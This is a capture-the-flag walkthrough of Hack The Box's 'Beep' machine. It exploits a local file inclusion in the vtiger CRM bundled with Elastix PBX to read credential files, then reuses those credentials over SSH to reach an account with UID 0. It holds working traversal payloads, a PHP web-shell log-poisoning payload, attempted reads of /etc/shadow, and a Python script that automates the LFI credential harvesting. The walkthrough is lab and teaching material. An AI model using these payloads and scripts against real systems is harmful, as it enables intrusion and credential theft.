HTB Beep Walkthrough — LFI to RCE on Elastix PBX
A full walkthrough of Hack The Box's "Beep": exploiting an LFI in the Elastix PBX web interface to leak configuration files and credentials, then reusing those credentials over SSH against an account that turns out to be UID 0.
Introduction
Beep is a retired Hack The Box machine from 2017 running Elastix, an open-source PBX (phone system) distribution built on Asterisk and FreePBX. PBX systems are a goldmine in pentesting because they are often poorly maintained, exposed to the internet, and running ancient software with known vulnerabilities.
The exploitation chain on Beep is short: a Local File Inclusion (LFI) vulnerability in the vtiger CRM bundled with Elastix lets us read arbitrary files as the web server user. That turns up the FreePBX database credentials in /etc/amportal.conf and the Asterisk manager credentials in /etc/asterisk/manager.conf. The manager password is reused for SSH, and the account it belongs to has UID 0, so the SSH login is already root. It is a clean chain that shows how a single file-read bug cascades into full compromise.
"PBX systems are the forgotten servers of the internet. They run for years without updates because 'if it ain't broke, don't fix it.' And then someone like you shows up."
Machine Info
- Name: Beep
- OS: Linux (CentOS)
- Difficulty: Easy
- Release: 2017
- Target IP: 10.10.10.7
Step 1: Enumeration
nmap -sC -sV -oN beep.nmap 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.3
110/tcp open pop3 Cyrus pop3d
111/tcp open rpcbind 2
143/tcp open imap Cyrus imapd
443/tcp open ssl/http Apache httpd 2.2.3
993/tcp open ssl/imap Cyrus imapd
995/tcp open ssl/pop3 Cyrus pop3d
3306/tcp open mysql MySQL 5.0.77
4445/tcp open upnotifyp?
This box is noisy: mail services, MySQL, HTTP, and HTTPS. The web server on 80/443 is the entry point.
Web Reconnaissance
curl -k https://10.10.10.7
<html>
<head><title>Elastix PBX</title></head>
<frameset rows="115,*">
<frame src="/vtigercrm/index.php?action=Login&module=Users">
</frameset>
It's running Elastix, which bundles vtiger CRM for its customer-portal module. The LFI lives in a script inside this same /vtigercrm/ application.
Step 2: The LFI Vulnerability
Elastix versions before 2.5.0 ship a vtiger CRM with an LFI in /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php. The module_name parameter is dropped into an include without sanitization, so a traversal sequence walks out of the modules directory. Append %00 to the payload: Beep runs CentOS 5 with PHP 5.1.6, old enough (pre-5.3.4) that a null byte truncates the include path and discards anything the script concatenates after the parameter.
# Test the LFI (the trailing %00 truncates the include path on this PHP version)
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00"
root:x:0:0:root:/root:/bin/bash
...
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:
We have LFI, running as the web server user, so anything that user can read is ours. The goal now is to read configuration files that contain credentials.
Targeting FreePBX Configuration
Elastix uses FreePBX under the hood. The FreePBX configuration file contains the MySQL database credentials, which often get reused for SSH:
# Read the FreePBX config
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00"
AMPDBHOST=localhost
AMPDBUSER=asteriskuser
AMPDBPASS=amp109
AMPDBNAME=asterisk
MySQL credentials: asteriskuser:amp109.
Are They Reused?
Try them as SSH credentials. The target runs OpenSSH 4.3, and a modern OpenSSH client refuses to negotiate with it by default, so re-enable the legacy key exchange and host key algorithms:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa asteriskuser@10.10.10.7
# Password: amp109
Permission denied.
No luck. MySQL on 3306 is a possible next stop with these credentials, but the LFI can read any file the web server user can, so keep reading files first.
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/freepbx.conf%00"
$amp_conf['AMPDBUSER'] = 'asteriskuser';
$amp_conf['AMPDBPASS'] = 'amp109';
Same credentials, just in PHP syntax. Check other places: the OS users and anything that could give a login.
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/shadow%00"
# Not readable (permissions): /etc/shadow is root-only and the LFI runs as the web server user
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/asterisk/.ssh/authorized_keys%00"
# No output shown; note that /etc/passwd put asterisk's home at /var/lib/asterisk, not /home/asterisk
Step 3: Web Shell via LFI + Log Poisoning
LFI can also become code execution through log poisoning. The idea: inject PHP into Apache's access log via the User-Agent header, then include the log file through the LFI so the injected PHP runs:
# Inject PHP code into Apache logs (the backslash keeps $_GET out of the shell's hands)
curl -k -A "<?php system(\$_GET['cmd']); ?>" https://10.10.10.7/
# Include the log file via LFI and pass a command
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/log/httpd/access_log%00&cmd=id"
# No output. /var/log/httpd/access_log is the right path on CentOS, but the directory is mode 0700 root-owned, so the web server user cannot read its own logs and the include fails.
Let's try a different approach. Keep looking for users and credentials:
curl -k "https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00"
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
[admin]
secret = amp111
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,user,config
Asterisk manager (AMI) credentials: admin:amp111. AMI is configured to listen on 5038 on all interfaces, but first try the password where it is most likely to have been reused.
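To script the three config reads (amportal.conf, freepbx.conf, manager.conf) and pull credentials out of them, here is an added Python example; it is not the walkthrough's or Elastix's code. It assumes the LFI path and parameter shown above, appends %00 as discussed, skips TLS verification because the box uses a self-signed certificate, and embeds constructed sample config text (mirroring the output above) so the parsers can be exercised offline; only the fetch needs a live target.

```python
#!/usr/bin/env python3
"""Pull config files through the vtiger CRM LFI and pick credentials out of them.
Added example for the Beep walkthrough; not Elastix's or the author's code."""
import re
import ssl
import sys
import urllib.parse
import urllib.request

LFI_PATH = "/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php"
TRAVERSAL = "../" * 8

# The three files the walkthrough reads; extend as needed.
TARGETS = ["/etc/amportal.conf", "/etc/freepbx.conf", "/etc/asterisk/manager.conf"]

SECTION_RE = re.compile(r"^\[([^\]]+)\]$")
KV_RE = re.compile(r"^([A-Za-z_][\w.]*)\s*=\s*(.*?)$")
PHP_RE = re.compile(r"""\$amp_conf\[\s*['"]([^'"]+)['"]\s*\]\s*=\s*['"]([^'"]*)['"]""")
SECRET_KEY_RE = re.compile(r"pass|secret|pwd", re.I)


def lfi_url(base, path, null_byte=True):
    """Build the include URL. A trailing NUL (%00) truncates the include path
    on PHP < 5.3.4 (Beep runs 5.1.6), discarding whatever the script appends."""
    inc = TRAVERSAL + path.lstrip("/") + ("\x00" if null_byte else "")
    return base.rstrip("/") + LFI_PATH + "?module_name=" + urllib.parse.quote(inc)


def fetch(url, timeout=10):
    """GET the URL; Elastix serves a self-signed certificate, so skip verification."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", "replace")


def parse_config(text):
    """Return (section, key, value) triples for the three formats seen on the box:
    KEY=value (amportal.conf), [section] key = value (Asterisk *.conf) and
    $amp_conf['KEY'] = 'value'; (freepbx.conf). Comment lines start with # or ;."""
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if m := SECTION_RE.match(line):
            section = m.group(1)
        elif m := PHP_RE.search(line):
            entries.append((section, m.group(1), m.group(2)))
        elif m := KV_RE.match(line):
            entries.append((section, m.group(1), m.group(2).strip()))
    return entries


def find_credentials(entries):
    """Return (user, secret, key) for every password-like value. AMPDBPASS pairs
    with AMPDBUSER in the same section; an Asterisk 'secret' belongs to the
    [section] it sits in, which is the username."""
    lookup = {(s, k.upper()): v for s, k, v in entries}
    creds = []
    for section, key, value in entries:
        if not value or not SECRET_KEY_RE.search(key):
            continue
        user_key = re.sub(r"PASS(WORD)?$", "USER", key.upper())
        user = lookup.get((section, user_key)) if user_key != key.upper() else None
        creds.append((user or section or "?", value, key))
    return creds


# Constructed samples mirroring the walkthrough's output, for offline use.
SAMPLE_AMPORTAL = "AMPDBHOST=localhost\nAMPDBUSER=asteriskuser\nAMPDBPASS=amp109\nAMPDBNAME=asterisk\n"
SAMPLE_MANAGER = "[general]\nenabled = yes\nport = 5038\n[admin]\nsecret = amp111\nread = system,call\n"
SAMPLE_FREEPBX = "<?php\n$amp_conf['AMPDBUSER'] = 'asteriskuser';\n$amp_conf['AMPDBPASS'] = 'amp109';\n"


def main(base):
    for path in TARGETS:
        for user, secret, key in find_credentials(parse_config(fetch(lfi_url(base, path)))):
            print(f"{path}: {key} -> {user}:{secret}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "https://10.10.10.7")
```

Run it as python3 lfi_creds.py https://10.10.10.7 (the filename is arbitrary). Every value under a pass/secret/pwd key comes out paired with its username, ready for an SSH or MySQL attempt.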
# Legacy algorithm options are needed for a modern client to talk to OpenSSH 4.3
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa admin@10.10.10.7
# Password: amp111
Last login: ...
We're in.
grep '^admin:' /etc/passwd
admin:x:0:0:root:/root:/bin/bash
The admin account has UID 0, and the UID is all the kernel checks: it is root under another name. SSHing in as admin gives us root directly, with no privilege escalation needed.
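The UID 0 check above, generalized: the added Python below (mine, not the walkthrough's) parses a passwd(5) file and flags UID 0 accounts other than root, any UID shared by several accounts, and UID 0 accounts that can still log in. The sample passwd is constructed to mirror the box's entries; pass a path to run it against a real file.

```python
#!/usr/bin/env python3
"""Audit /etc/passwd for root-equivalent accounts. Added example, not from the
walkthrough; the sample below is constructed to mirror the box's entries."""
import sys
from collections import defaultdict

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

# Constructed sample: two UID 0 entries, one of them not called root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:/bin/bash
admin:x:0:0:root:/root:/bin/bash
fanis:x:500:500::/home/fanis:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue
        name, pw, uid, gid, gecos, home, shell = parts
        users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def root_aliases(users):
    """Every UID 0 account that is not literally 'root'. The kernel checks the
    number, not the name, so each of these is a second root login."""
    return sorted(u["name"] for u in users if u["uid"] == 0 and u["name"] != "root")


def shared_uids(users):
    """Map uid -> names for any UID held by more than one account. A shared UID
    means one password compromise hands over the other account's files too."""
    by_uid = defaultdict(list)
    for u in users:
        by_uid[u["uid"]].append(u["name"])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def interactive_uid0(users):
    """UID 0 accounts that can log in: a real shell and a password field that is
    not locked in passwd itself ('x' means the hash lives in /etc/shadow)."""
    return sorted(u["name"] for u in users
                  if u["uid"] == 0 and u["shell"] not in NOLOGIN_SHELLS
                  and not u["pw"].startswith(("!", "*")))


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    users = parse_passwd(text)
    print("root aliases:", root_aliases(users))
    print("shared uids:", shared_uids(users))
    print("interactive uid 0:", interactive_uid0(users))
```

The quick shell equivalent is awk -F: '$3 == 0' /etc/passwd, which catches the admin entry here; the script additionally reports shared non-zero UIDs, which are the same problem one level down.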
Flags
cat /root/root.txt
ls /home/
fanis
cat /home/fanis/user.txt
The user flag lives under fanis, the box's intended low-privilege user, but since admin is UID 0 we can read it directly. Both flags collected.
Step 4: The Intended Path
The intended chain is:
- LFI to read /etc/amportal.conf → MySQL credentials asteriskuser:amp109, which don't work for SSH
- LFI to read /etc/asterisk/manager.conf → Asterisk manager credentials admin:amp111
- admin has UID 0, so SSH with those credentials gives root
Lessons Learned
- LFI is never just an information leak — even if you can't get RCE from it, LFI gives you file reads. On a PBX system, that's enough to compromise the entire box.
- Check UID 0 accounts: /etc/passwd lists every account and its UID. Any account with UID 0 is root, whatever it is called. A second UID 0 account is a common misconfiguration on PBX and appliance systems, and worth checking on any box you land on.
- Asterisk manager is a goldmine — the manager.conf file on Asterisk PBX systems often contains cleartext credentials with full administrative access.
"Beep is one of those boxes that feels like cheating — LFI leads directly to root with nothing in between. But that's the real world. Sometimes the chain is just one link long."
